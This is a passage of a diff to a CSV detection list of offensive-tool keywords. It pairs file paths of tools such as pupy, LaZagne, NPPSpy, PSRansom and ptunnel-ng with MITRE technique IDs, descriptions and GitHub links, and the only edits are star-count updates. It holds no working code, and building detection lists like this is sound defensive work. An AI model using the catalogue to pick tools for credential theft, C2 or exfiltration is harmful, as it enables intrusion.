systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*/PSpersist.git*","offensive_tool_keyword","Pspersist","Dropping a powershell script at %HOMEPATH%\Documents\windowspowershell\ that contains the implant's path and whenever powershell process is created the implant will executed too.","T1546 - T1546.013 - T1053 - T1053.005 - T1037 - T1037.001","TA0005 ","N/A","N/A","Persistence","https://github.com/TheD1rkMtr/Pspersist","1","1","N/A","10","1","72","17","2023-08-02T02:27:29Z","2023-02-01T17:21:38Z" -"*/pspy -*","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","N/A","6","10","4029","449","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z" -"*/PSPY.dll*","offensive_tool_keyword","NPPSpy","Simple code for NPLogonNotify(). The function obtains logon data including cleartext password","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/gtworek/PSBits/blob/master/PasswordStealing/NPPSpy","1","1","N/A","10","10","2669","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" -"*/pspy.git*","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","1","N/A","6","10","4029","449","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z" -"*/pspy.go*","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","N/A","6","10","4029","449","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z" -"*/pspy/cmd*","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","N/A","6","10","4029","449","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z" -"*/pspy32*","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","1","N/A","6","10","4029","449","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z" -"*/pspy64*","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","1","N/A","6","10","4029","449","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z" +"*/pspy -*","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","N/A","6","10","4030","449","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z" +"*/PSPY.dll*","offensive_tool_keyword","NPPSpy","Simple code for NPLogonNotify(). The function obtains logon data including cleartext password","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/gtworek/PSBits/blob/master/PasswordStealing/NPPSpy","1","1","N/A","10","10","2670","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" +"*/pspy.git*","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","1","N/A","6","10","4030","449","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z" +"*/pspy.go*","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","N/A","6","10","4030","449","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z" +"*/pspy/cmd*","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","N/A","6","10","4030","449","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z" +"*/pspy32*","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","1","N/A","6","10","4030","449","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z" +"*/pspy64*","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","1","N/A","6","10","4030","449","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z" "*/PSRansom -*","offensive_tool_keyword","PSRansom","PSRansom is a PowerShell Ransomware Simulator with C2 Server capabilities. This tool helps you simulate encryption process of a generic ransomware in any system on any system with PowerShell installed on it. Thanks to the integrated C2 server. you can exfiltrate files and receive client information via HTTP.","T1486 - T1107 - T1566.001","TA0011 - TA0010","N/A","N/A","Ransomware","https://github.com/JoelGMSec/PSRansom","1","0","N/A","N/A","4","371","95","2022-09-29T09:54:34Z","2022-02-27T11:52:03Z" -"*/psscanner.go*","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","N/A","6","10","4029","449","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z" -"*/PSSW100AVB*","offensive_tool_keyword","PSSW100AVB","This is the PSSW100AVB (Powershell Scripts With 100% AV Bypass) Framework.A list of useful Powershell scripts with 100% AV bypass ratio","T1548 T1562 T1027","N/A","N/A","N/A","Defense Evasion","https://github.com/tihanyin/PSSW100AVB","1","1","N/A","N/A","10","983","166","2022-06-18T16:52:38Z","2021-10-08T17:36:24Z" -"*/pswRecovery4Moz.txt*","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","8527","1980","2023-08-12T12:38:22Z","2015-02-16T14:10:02Z" +"*/psscanner.go*","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","N/A","6","10","4030","449","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z" +"*/PSSW100AVB*","offensive_tool_keyword","PSSW100AVB","This is the PSSW100AVB (Powershell Scripts With 100% AV Bypass) Framework.A list of useful Powershell scripts with 100% AV bypass ratio","T1548 T1562 T1027","N/A","N/A","N/A","Defense Evasion","https://github.com/tihanyin/PSSW100AVB","1","1","N/A","N/A","10","984","166","2022-06-18T16:52:38Z","2021-10-08T17:36:24Z" +"*/pswRecovery4Moz.txt*","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","8530","1980","2023-08-12T12:38:22Z","2015-02-16T14:10:02Z" "*/ptunnel-ng*","offensive_tool_keyword","ptunnel-ng","Tunnel TCP connections through ICMP.","T1095.001 - T1043 - T1572.001","TA0011 - TA0040 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/utoni/ptunnel-ng","1","1","N/A","N/A","3","285","60","2023-05-17T12:47:52Z","2017-12-19T18:10:35Z" "*/puckiestyle/CVE-2022-0847*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/puckiestyle/CVE-2022-0847","1","1","N/A","N/A","1","1","1","2022-03-10T08:10:40Z","2022-03-08T14:46:21Z" "*/puppet-naivesigning.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/pupwinutils/*.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"*/pupy/*.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"*/pupy/commands/*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"*/pupy/memimporter/*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"*/pupy/output/pupyx64*.exe*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"*/pupy/pupygen.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"*/pupy_load.*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"*/PupyCmd.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"*/PupyCompile.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"*/pupygen.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"*/pupylib/payloads/*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"*/PupyOffload.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"*/pupyps.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"*/PupyServer.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"*/PupyService.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"*/pupysh.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"*/PupyTriggers.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"*/PupyWeb.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*/pupwinutils/*.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*/pupy/*.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*/pupy/commands/*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*/pupy/memimporter/*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*/pupy/output/pupyx64*.exe*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*/pupy/pupygen.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*/pupy_load.*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*/PupyCmd.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - 